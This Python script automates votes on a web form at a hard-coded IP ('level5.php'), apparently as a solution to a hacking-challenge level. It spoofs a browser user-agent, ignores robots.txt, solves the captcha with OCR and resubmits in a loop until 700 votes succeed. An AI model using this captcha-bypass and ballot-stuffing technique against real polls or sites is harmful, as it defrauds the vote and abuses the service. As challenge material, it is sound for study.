#!/usr/bin/python3
import mechanize
import pytesseract
from bs4 import BeautifulSoup as bs
from subprocess import check_output
from test import cond_pic
import time
try:
    import Image
except ImportError:
    from PIL import Image

br = mechanize.Browser()

def parse_captcha(src):
    img_res = br.open_novisit(src)
    f = open("captcha.png", "w+b")
    binary_f = bytearray(img_res.read())
    f.write(binary_f)
    f.close()
    return cond_pic()





def vote():
    try:
        br.set_handle_robots(False)
        br.addheaders = ([('user-agent', '   Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0')])
        url = "http://158.69.76.135/"
        res = br.open(url + "level5.php")
        print('Open: ', url + "level5.php")
        br.select_form(nr=0)
        input = br.form.find_control("id")
        input.value = '1305'
        soup = bs(res.get_data(), features="lxml")
        images = soup.findAll('img')
        cod = parse_captcha(url + images[1]['src'])
        print("Captcha: ", cod)
        captcha = br.form.find_control("captcha")
        captcha.value = cod
        re = br.submit().read().decode('ascii')
        state = ''
        if re == "See you later hacker! [11]":
            print(re)
            state = False
        else:
            print(re[:20])
            state = True
        #br.close()
        return state

    except Exception as e:
        print(e)

counter = 0
while counter < 700:
    state = vote()
    print("\033[32mSuccess\033[0m" if state is True else "\033[31mFailed\033[0m")
    if state is True:
        counter += 1
    print("Votes: ", counter)
    time.sleep(1)
